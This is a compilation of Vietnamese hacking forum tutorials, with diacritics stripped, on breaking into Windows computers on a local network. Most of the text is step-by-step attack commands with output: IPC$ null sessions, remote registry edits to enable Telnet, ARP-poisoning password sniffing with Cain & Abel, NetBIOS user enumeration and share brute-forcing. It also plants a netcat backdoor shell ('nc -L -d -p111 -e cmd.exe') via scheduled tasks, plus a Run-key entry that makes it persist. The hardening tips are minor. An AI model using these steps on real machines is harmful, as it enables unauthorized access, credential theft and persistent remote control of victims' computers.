[Hacking] HACK COMPUTER TRONG LAN (HVA)

Bi 1:
Hack computer trong LAN. Khng c g mi m trong cch xm nhp nhng nhiu ngi s dng
my tnh trong LAN vn mc phi,
Bi ny mnh vit vi mong mun cho cc bn thy rng hacker c th s dng mi th xm nhp
my tnh ngay c nhng iu mnh ngh l n gin nht
ch tn cng
Tn my tnh: victim
a ch IP: 192.168.1.3
H iu hnh: Windows Server 2003
Bc 1: u tin ta kt ni n ipc$ s dng lnh sau:
Code:
c:\net use \\victim\ipc$ /u:administrator
Bc 2: M registry v kt ni thao tc Registry vi my tnh victim bng cch
Code:
Start-->Run g regedit [enter]
Trong mi trng Registry Editor. Chn Connect Network Registry
Nhp tn my tnh cn thao tc Registry t xa. y l victim
Bc3:
Sau khi kt ni thnh cng n Registry ca victim ta n
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer
Thay i gi tr NTLM =0 disable NTLM
Bc 4:
S dng MMC khi ng Telnet t my victim
Bc 5: Kt ni n my victim
Code:
c:\telnet victim
Khi login vo c my victim ri th vic tip theo phi lm g khi c shell th chc mnh khi phi ni
tip
.

M dch v Telnet ch lm mt trong nhng cch m hacker s dng truy nhp vo my victim.
Trng hp khc c th m Remote Desktop, ...etc
Qua y cho ta thy rng nn disable nhng dch v khng cn thit v khng Administrator rng
hoc t mt khu Administrator qu n gin, ...etc
Ch cn mt s h nh i vi my tnh ca mnh th my tnh ca mnh c th b xm hi.
r hn cc bn c th ti video demo HACK LAN
Bi 2:

Bi th 2 mnh mun trnh by vi cc bn k thut Sniff Password s dng Cain & Abel.
Cain & Abel l mt trong nhng cng c ng trong top cc cng c v security. Cc bn c th ti
phin bn mi nht ti http://oxid.netsons.org/download/ca_setup.exe
Hin ti mnh s dng phin bn Cain & Abel v4.9.3
Cain & Abel v4.9.3 released
New features:
- Added Windows Mail (Vista) Password Decoder for POP3, IMAP, NNTP, SMTP and LDAP accounts.
- Added PTW WEP cracking attack.

- Added Windows Vista support in Wireless Password Decoder.

- Wireless Password Decoder now uses DLL injection under XP.
Cc tnh nng ca Cain th khi phi ni , qu tri tri lun, y mnh ch gii thiu Sniff Password.
Cc bn c th tham kho thm nhng tnh nng ca n trong ti liu km theo chng trnh.
Bc 1: Sau khi install xong Cain v khi ng Cain th ta cn phi cu hnh Network Adapter cho
ng.
Trn menu ca Cain chn Configure --> la chn Network Adapter ph hp
Click Start Sniffer
Bc 2: La chn Tab Sniffer --> Scan MAC Addresses, y s ra danh sch cc a ch IP m
chng trnh Scan c
Bc 3: Tab bn di ca Tab Sniffer la chn phn APR. Tai khung APR ta c th thm a ch IP
m cn sniff. La chn IP ch , IP ngun
Bc 4: V click Start APR, v ngi ch password "v lng"
Cc bn c th xem video clip sau bit r hn
Trong on video clip mnh s sniff password gi t my c IP: 192.168.1.7.
a ch IP my mnh l 192.168.1.6 c s dng chng trnh Cain ang ch dzt bt k password
no m my 192.168.1.7 trnh )
Bi 3:
Bi vit ny vi mc ch chia s,hc hi,trao i kin thc! Ni dung ca bi vit l hack vo PC s
dng HH windows v cc phng php phng chng (trong phm vi kin thc ca tui thi nha).
By gi chng ta cng bt u suy ngh nhng hng phi i. Khi bn Online ( tc kt ni vo
Internet) bn s c ISP gn cho mt IP no . Vy Hacker c bit c IP ca bn khng? Cu
tr li l c ( nu Hacker giao tip vi bn,c ngha l my ca bn v my ca hacker c s kt ni,
ng ngha vi vic trao i cc packet,t cc packet c th bit c a chi IP ngun)
Khi bit IP ca bn liu hacker c th hack vo my tnh ca bn khng? Cu tr li l hon ton c
th.
Vy hacker lm nh th no Hack?
Hacking thng qua resource share:
Hacker c th dng cc tool hack t ng v d nh : ent3,legion ( nhng bn cht ca cc cng c
ny l thc hin cc bc m ti s ni di y 1 cch t ng,chnh v vy vic dng cc tool ny
l mt cch kh c chui )
Trc tin Hacker s kim tra nhng ti nguyn c chia s trn my tnh ca bn.
Ch bng vi dng lnh n gin trn comand line:
CODE
[C:\>Net view \\x.x.x.x ( vi x.x.x.x l a ch IP ca bn m hacker bit )
Shared resources at \\x.x.x.x
Share name Type Used as Comment
------------------------------------------------------------------------------C Disk
PRJA3 Disk
The command completed successfully.
C:\>
Vi Windows 95 & 98 th kh nng b hack Cao hn nhiu so vi Windows NT,2000,XP ( v win 95,98
dng nh dng FAT&FAT32 c bo mt thp hn nhiu so vi NTFS)

i vi hai loi Windows ny (95,98) Hacker thm ch khng cn ly Administrator cng c th lm

c tt c ( bn c tin khng ?).
Khuyn co : khng nn dng 2 loi win ny v qu li thi v c th b hack bt c lc no.
Sau khi lit k cc a,folder share bc tip theo ca hacker l phi truy cp vo cc a,folder
ly d liu (y cng l mc ch ca hacker).Hacker s nh s a ,th mc share truy
cp vo.
Cng bng command line:
CODE
C:\> net use z: \\x.x.x.x \share
The command completed successfully
.

Chng l hack n gian vy sao ? Khng , khng h n gin nh th bi v my ca victim c t

password ( vic nh s cn phi bit username & password ).Th l Hacker p tay ? khng hacker
khng bao gi chu p tay,hacker s c gng ly username & password
Ly Username :
CODE
C
:\> Nbtstat A x.x.x.x
NetBIOS Remote Machine Name Table
Name Type Status
--------------------------------------------ADMIN <00> UNIQUE Registered
BODY <00> GROUP Registered
ADMIN f <20> UNIQUE Registered
BODY <1e> GROUP Registered
BODY <1d> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-08-A1-5B-E3-8C
Vy my x.x.x.x s c 2 username l : ADMIN va BODY
Khi c username hacker s tin hnh Crack password ( da vo cc tool nh : pqwak,xIntruder)
Hoc Hacker s tin hnh to ra mt t in ( da vo kh nng phn on ca hacker ) tn l :
pass.txt
CODE
ADMIN
123456 ADMIN
123456 BODY
BODY

Sau hacker crack bang lnh :

[/CODE]
Cng c th to Userlist.txt v passlist.txt ri dng lnh:

CODE
C:\> FOR /F %i IN (1,1,254) DO nat u userlist.txt p passlist.txt x.x.x.x.%I>>output.txt
i vi Win 2000,XP hacker s khng l g nu khng phi administrator chnh v vy hacker bng
mi gi s ly cho c administrator.
nu ly c admin th vic cn li th ch hacker nh ot.
Khuyn co : khng nn share g ht ( trong trng hp buc phi share th nn t password phc
tp 1 cht )
Gi s rng my ca Victim khng share. Vy hacker lm sao ?
Trong trng hp ny hacker s on user & pass (c th dng cch trn hoc dung cc tool nh:
user2sid/sid2user,dumpACL,SMBGrind) sau kt ni ti IPC$ ( mc nh share ca windows)
CODE
C:\> net use \\x.x.x.x\IPC$ password /user:administrator
The command completed successfully.
Trong trng hp khng th on c user & pass hacker c th thit lp mt Null session ti my
victim:
CODE
C:\> net use \\x.x.x.x\IPC$ /user:
The command completed successfully
V ri nu victim permission khng ng s c nhng hu qu khn lng.
khuyn co : V hiu ho NetBios ( Bm vo My Network Places chn Local Area Connetion, chn
TCP/ IP sau bm vo propperties chn Advandce, chn WINS v bm vo Disable NetBIOS over
TCP / IP), Dng firewall chn 1 s port khng cn thit , kho ti khon sau 1 s ln ng nhp tht
bi .
Tin y cng ni thm v iu khin t xa ( v c nhiu bn t nhp c vo ri m khng bit
phi lm sao )
Gi s rng bn c username,password ca admin ca my victim ri:
gi thit lp 1 phin lm vic:

CODE
C:\> net use \\x.x.x.x\IPC$ password /user:administrator
The command completed successfully.
Sau ta cn copy backdoor iu khin my victim c rt nhiu loi backdoor nhng ti thy hn
c vn l : netcat ( nc)
chp nc vo my victim

CODE
C
:\>copy nc.exe \\x.x.x.x\ADMIN$\nc.exe
The command completed successfully.
1 file copies

Chy service Schedule trn my victim ( c service ny mi thc thi c cc file trn my victim,
mc inh khi ci win s chy service ny)

CODE
C:\> sc \\x.x.x.x start schedule
service_name : schedule
By gi kim tra gi trn my victim

CODE
C:\> net time \\x.x.x.x
Current time at \\10.0.0.31 is 6/29/2005 4:50 AM
The command completed successfully.
By gi chy netcat ch n lng nghe cng 111:

CODE
C:\>AT \\x.x.x.x 4:55 /interactive c:\windows\nc.exe L d p111 e cmd.exe
Added a new job with job ID = 1
i n 4:55 ri chy th nc.exe

CODE
C:\>nc nvv x.x.x.x 111
(UNKNOWN) [x.x.x.x] 111 (?) open
Microsoft Windows XP [Version 5.1.2600]
Copyright 1985-2001 Microsoft Corp.
C:\windows>
By gi lm g th tu nha ( nhng ng c ph hoi ngi ta nhe)
Vn l lm sao cho nhng ln sau victim bt my tnh ln netcat t ng chy v lng nghe mnh
lnh ca ta?
Bn c th cho netcat khi ng cng windows. "moi" file netcat.reg (dng notepad v save li
thnh .reg) c ni dung nh sau:

CODE
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run]
"netcat"="\"C:\\nc\\nc.exe\" -L -d -p111 -e cmd.exe"
Sau copy sang my victim v chy nha!
Hy vng mi ngi ng ph hoi nha ! Thn
Tc gi: ZENO-HVAOnline
Bi 4: Phng php c bn t nhp trong Lan

Link: http://www.kmasecurity.net/xforce/thao-luan-chung-ve-hacking/1573-phuong-phap-co-ban-dedot-nhap-trong-lan.html
(su tm)
1- Kim tra IPC share: IPC vit tt ca Inter-Process Communication, c dng trong vic chia s
d liu gia cc ng dng v my tnh trn mng

(NT/2K). Khi mt my c khi ng v log vo mng, hdh s to 1 chia s ngm nh tn l IPC$.

N s gip cho cc my khc c th nhn thy v

kt ni n cc chia s trn my ny. Tuy nhin, c th v mt l do g , ngi dng xa mt IPC$

share, do , ta cn kim tra v to li kt ni n

IPC$ (gi l null connection), nu kt ni thnh cng, ta c th thy c c cc chia x c bit

c n (bao gm C$, ADMIN$, IPC $, IPC$). C th,

dng 1 trong 3 lnh sau command prompt:

C:\>NET USE \\TARGET\IPC$ "" /USER:""
C:\>NET USE \\TARGET\IPC$ * /USER:
C:\>NET USE \\TARGET\IPC$ * /USER:""

trong : target l computername hoc IP ca my bn mun kt ni.

Lu , cc chia x c du $ pha sau tn ch ra rng chia x c n v cch ny ch p dng khi
cng NetBios 139 ca my bn v my ch c m.
Thng l i vi chia x dng ny, bn s t c c hi khai thc c g. Tuy nhin, nu may mn,
bn vn c th khai thc c trong trng hp cc chia x khng yu cu mt khu.

K n, bn dng lnh sau xem cc chia x thy c:

C:\>net view \\TARGET
Lnh net view s lit k danh sch cc share ca my ch. Bn dng net view /? bit thm cc
cch dng khc.
Sau khi to c null connection v bit c cc share trn my i phng. i vi cc share
c bo v bng username/password, bn c th dng cc tool sau th crack chng: Nat
(NetBIOS Auditing Tool)...
tit kim thi gian, bn tm v dng th chng trnh xSharez scanner, cng c th cho bn kt
qu tng t.

2- Kim tra cc cng m

Mt cch khc connect vo mt my l duyt cc port m ca my ch. Tu loi port m ta c
cch thc khai thc khc nhau, n gin nht l dng

telnet connect vo my thng qua port c m, v d:

C:\telnet Vietnam.info
Mt s port thng dng:
21: FTP
23: Telnet proxy server
25: SMTP
110: POP3
139: NETBIOS
1080: SOCKS proxy
6667: IRC mapping
.....
Cc cng c scan port c rt nhiu, v d nh: superscan, elite, .... Cc bn c c th vo phn
cng c Learning hacking For Viet ti v
Sau khi scan c port no ang opened, nu port ngoi nhng port trn, bn th dng telnet
connect, nu thnh cng, bn c th vo command prompt shell ca my .

3- Kim tra cc l hng ca OS/Software

Cch cui cng t ni y, cng l cch kh nht l duyt xem my ang dng OS g, server g,
software no. Mi loi trn c cc hole/vulnerability ring, c tm thy v m t chi tit trong cc
site v security nh ntbugtraq, securityfocus, hoc trong forum.
T nhng l hng bit c, ta s dng cc exploit tng ng thm nhp vo my.
Li s ng nht trong cc system software l li v cch t password, v d nh cc my Wins 9x
c th vo m khng cn password (tt nhin l khi , ngi log vo s b hn ch truy cp cc ti
nguyn mng); hoc nh vi NT/2K, sau khi setup, password ngm nh ca adminnistrator l rng,
nu user khng thay i pass cho admin, th ta c th connect remote c di username l
administrator m khng cn pass.
Cc li cn li thng l do cc sai st trong qu trnh vit chng trnh m v tnh to nn nhng l
hng, cc on code kim tra khng y , khng stable...cho php ngi dng thc thi cc lnh,
chy cc chng trnh t xa. V d nh bug Unicode encoding ca IIS4... V cch thng dng
nhp l tm cch send 1 trojant/backdoor (in hnh nh Netcat...) n my , chy backdoor
m 1 port nht nh no , ri ta s connect remote vo port